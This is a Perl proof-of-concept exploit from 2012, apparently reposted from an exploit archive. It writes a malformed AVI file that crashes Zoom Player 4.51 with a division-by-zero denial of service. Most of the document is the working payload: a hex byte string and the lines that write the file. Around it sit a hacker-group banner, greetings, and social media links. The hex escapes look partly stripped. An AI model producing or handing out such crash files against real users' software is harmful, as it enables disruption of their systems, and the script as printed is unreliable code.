|
|
|
Zoom Player 4.51 Denial Of ServicePosted on 30 June 2012 #!/usr/bin/perl
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' __ /'__` / \__ /'__` 0
#0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1
#1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0
#0 / / / / \__/ \_ \_ / 1
#1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0
#0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
#1 \____/ >> Exploit database separated by exploit 0
#0 /___/ type (local, remote, DoS, etc.) 1
#1 1
#0 [x] Official Website: http://www.1337day.com 0
#1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com #
#1 ========================================== 1
#0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
#0 1
#1 dark-puzzle[at]live[at]fr 0
#0 ========================================== 1
#1 Pentesting/exploit coding/bug research 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# [0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]
# Exploit Title: Zoom Player 4.51 Standard - Division By Zero Vulnerability .
# Author: Dark-Puzzle .
# Danger : Medium .
# Category :Local Exploit .
# Version: 4.51 Standard
# Vendor : http://www.inmatrix.com/
# Software Link : http://www.oldapps.com/download.php?oldappsid=zp451std.exe
# Date: 30 June 2012 .
#------------------------------------------------------------------------#
# #
# Usage : perl zoom.pl #
# #
#------------------------------------------------------------------------#
my $h ="x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00
x9bx0exf3xf8xdbxa7x3bx6fxc8x16x08x7fx88xa2xf9xcb
x87xabx7fx17xa9x9fxa1xb9x98x8ex2bx87xcbxf9xbex50
x42x99x11x26x5cxb6x79x44xecxe2xeex71xd0x5bx50x4e
x37x34x3dx55xc8x2cx4fx28x9axeaxd0xc7x6dxcax47xa2
x07xdax51xb7x97xe6x1cxd5xd8x32xf9xb1x04xa7x08xb2
xe9xfbxb5x1axb7xa7x7axa6xf9xf6xc9x93x91xa1x21x29
xa3x1cxe3xc7xcbx17xfdx8dx65xfdx81x61x6bx89xafx53
x31x45x0cx71xcbx93xcbx6ex2axcfxa6x76x1axa8xccxad
x81xfdxc4x56xa7x82xdax3dx20x80xffx4cxbexc0x4cx61
x9ex75x4cx71xa2x9dxfdx65xccx59x23xe0xebxaex58xa3
xe9xffx16xfcx08x03x36x4ax69xbbxc4x19x10x1bxc8x2c
x9exd9x56xfex38x32xf7xe5x2cxd8xb4x6cx31xccx15x5c
x41xdax03xdex5cx23x2dxdax4fx7bx44x07x60x24xa7x58
x65xf7xe9xaaxffx02x9dx1fx39x76x7ex75x43xacxe5xc9
xd0x43x2ex4cxebx81x26xb5xcfx6dxb9xe9xa0xc7x85x4a
xcex5fxb4x34x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x06x00x00x00x00x00x06x00x00x00xff
xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff
xcbx6ex2axcfx00x00x00x00x00x00x00x00x00x00x00x00";
# A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) .
# to close the Zoom player you have to use the Windows Task Manager .
my $file = "darkexploit.avi";
open ($File, ">$file");
print $File $h;
close ($File);
#------------------------------------------------------------------------------------------------------------------------
#Dark-Puzzle (Souhail) .
#x90
#Follow me : fb.me/dark.puzzle
#x90
#Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
#x90
#Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
#x90
#Pentesting is my LIFE .
#x90
#GREY HAT Mercy From M0rocC0 .
TOP
|
|